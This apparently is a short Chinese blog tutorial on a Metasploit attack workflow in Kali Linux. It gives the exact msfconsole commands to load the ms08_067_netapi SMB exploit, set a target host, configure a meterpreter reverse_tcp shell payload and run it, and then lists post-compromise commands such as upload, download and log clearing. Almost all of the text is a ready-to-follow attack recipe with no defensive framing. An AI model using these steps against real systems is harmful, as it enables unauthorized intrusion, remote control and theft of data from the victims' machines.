kali中Metasploit渗透流程

1、运行命令msfconsole,开启msf

2、search命令用于查找msf内中的模块,运行search ms08-067,查找要利用的漏洞(ms08_067),结果:

exploit/windows/smb/ms08_067_netapi

3、使用该模块,运行use  exploit/windows/smb/ms08_067_netapi

4、使用命令show options查看需要设置那些参数,yes为必选项,该模块只需要设置目的主机

5、设置目的主机set RHOST 192.168.1.1

6、设置payload为反弹shell,运行命令set payload windows/x64/meterpreter/reverse_tcp

7、运行run进行渗透。

8、渗透成功会返回shell,msf内置的可用命令,cd,cat,del,edit,ls,mkdir,rmdir,upload,download,clearrev等。

     部分渗透模块可能还需要设置目标主机操作系统类型,可以使用以下命令:

show targets            //查看模块适配的操作系统

set  target 34         //34为操作系统编号

       在实际使用中多使用show命令查看设置信息,unset取消设置的参数,退回上一步使用back,推出msf使用exit。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值